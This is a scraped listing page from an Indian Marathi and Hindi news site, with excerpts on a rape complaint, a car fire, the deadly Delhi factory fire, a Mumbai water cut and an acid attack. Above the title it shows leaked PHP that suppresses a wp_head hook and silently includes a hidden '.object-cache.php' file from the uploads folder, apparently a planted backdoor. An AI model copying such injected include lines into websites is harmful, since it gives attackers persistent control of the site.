add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); समाचार – SOCH INDIA
Menu

लग्नाचा शब्द देऊन फसवणूक करणाऱ्या प्रियकराविरोधात प्रेयसीने बलात्काराची तक्रार नोंदवली आहे. आपल्याला लग्न करायचे आहे असे सांगून आरोपी मला त्याच्यासोबत दिल्ली येथे घेऊन गेला. तिथे त्याने आठ दिवस माझ्यावर बलात्कार केला व नंतर मला तिथेच सोडून पळून गेला असे पीडित महिलेने तिच्या तक्रारीत म्हटले आहे. टाइम्स ऑफ इंडियाने हे...

Read More

भरधाव वेगात असलेल्या ‘ऑडी’ने भर रस्त्यातच अचानक पेट घेतल्याची घटना रविवारी सायंकाळी घडली. या घटनेत ही लाखमोलाची कार अक्षरशा जळून खाक झाली. सुदैवाने कारचे मालक अनिल भारती हे वेळीच कारमधून बाहेर पडल्याने जीवितहानी टळली. दरम्यान, अग्निशमन दलाच्या जवानांनी होत आग आटोक्यात आणली. शॉर्टसर्किटमुळे कारने पेट घेतला असल्याची माहिती अग्निशमन...

Read More

दिल्ली के रानी झांसी रोड (Rani Jhansi Road) पर अनाज मंडी (Anaj mandi) इलाके में सोमवार को एक बार फिर आग (Fire) लगने की खबर है. बताया जा रहा है कि यह आग उसी बिल्डिंग में लगी है जिसमें रविवार को लगी आग में 43 लोगों की मौत हो...

Read More

स्वत:मधील सर्जनशील कलेला रंगभूमीची जोड देऊन वैविध्यपूर्ण एकांकिका सादर करण्याचा प्रयत्न ठाणे विभागातील विविध महाविद्यालयांच्या कलाकारांनी ‘लोकसत्ता लोकांकिका’च्या मंचावरून केला. शनिवारी या स्पर्धेच्या प्राथमिक फेरीचा पहिला टप्पा झाल्यानंतर दुसरा टप्पा रविवारी मोठय़ा उत्साहात पार पडला. ‘लोकसत्ता लोकांकिका’ या राज्यस्तरीय आंतरमहाविद्यालयीन मराठी एकांकिका स्पर्धेच्या ठाणे विभागातील दोन टप्प्यांत भाग घेतलेल्या...

Read More

वाहनात क्षमतेपेक्षा अधिक विद्यार्थी, नियमबाह्य़ रचना अशी शालेय विद्यार्थ्यांची अनधिकृत वाहतूक सर्रास सुरू आहे. वाहतूक नियमन विभागाने अशा वाहनांवर कारवाई सुरू केली असली तरी त्याचे प्रमाण अत्यल्प असल्याचा आक्षेप घेण्यात येत आहे. विद्यार्थी वाहतुकीचा विषय गेले अनेक वर्षे गाजत आहे. नियम, कायदे झाले तरीही वाहनांमध्ये कोंबलेले विद्यार्थी, विद्यार्थ्यांना घेऊन...

Read More

घरगुती कलह विकोपाला गेल्यानंतर जन्मदात्या वडिलांकडून मुलाची हत्या झाल्याची घटना चंद्रपुरात घडली आहे. हत्या केल्यानंतर स्वतः वडिलांनी पोलिसांत जाऊन आत्मसमर्पण केलं आहे. बल्लारपूर येथील विद्यानगर वॉर्डात ही थरारक घटना सकाळी घडली. राहुल सोपान नगराळे (वय ४२) असं मृतकाचे नाव आहे तर सोपान नगराळे (वय ७४) असे आरोपी पित्याचे नाव...

Read More

पिसे उदंचन केंद्रातील दुरुस्तीचे काम हाती घेण्यात येत असल्यामुळे ७ ते १३ डिसेंबर या कालावधीत मुंबईतील पाणीपुरवठय़ात १० टक्के पाणीकपात करण्यात येणार आहे. त्यामुळे पाणी जपून वापरावे असे आवाहन पालिकेकडून करण्यात आले आहे. पिसे उदंचन केंद्रात न्यूमॅटिक गेट सिस्टीमची दुरुस्ती करण्यात येणार आहे. हे काम ३ डिसेंबर रोजी हाती...

Read More

राजधनी दिल्लीतील एका फॅक्ट्रीला आज सकाळी भीषण आग लागल्याची घडली. यामध्ये आतापर्यंत ४३ जणांचा मृत्यू झाला आहे तर अनेकजण जखमी आहेत. शिवाय अनेकांना वाचवण्यात यश आले आहे. आगीत होरपळलेल्यांना तातडीने रुग्णालायत दाखल करण्यात आले आहे, मात्र त्यामधील काहींची परिस्थिती चिंताजनक असल्याची माहिती समोर येत आहे. या पार्श्वभूमीवर पंतप्रधान कार्यालयाच्यावतीने...

Read More

उत्तर प्रदेशमधील उन्नाव येथे बलात्कार पीडित मुलीला जाळण्याच्या घटनेच्या एक दिवस आधी मुजफ्फरनगर जिल्ह्यातील एका ३० वर्षीय महिलेवर चार जणांनी अ‍ॅसिड फेकल्याची घटना उघड झाली आहे. न्यायालयात सुरू असलेला बलात्काराचा खटला मागे घ्यावा असे आरोपींचे म्हणणे होते. त्यांचे म्हणणे तिने न ऐकल्याने हा अॅसिड हल्ला करण्यात आल्याचे पीडित महिलेचे...

Read More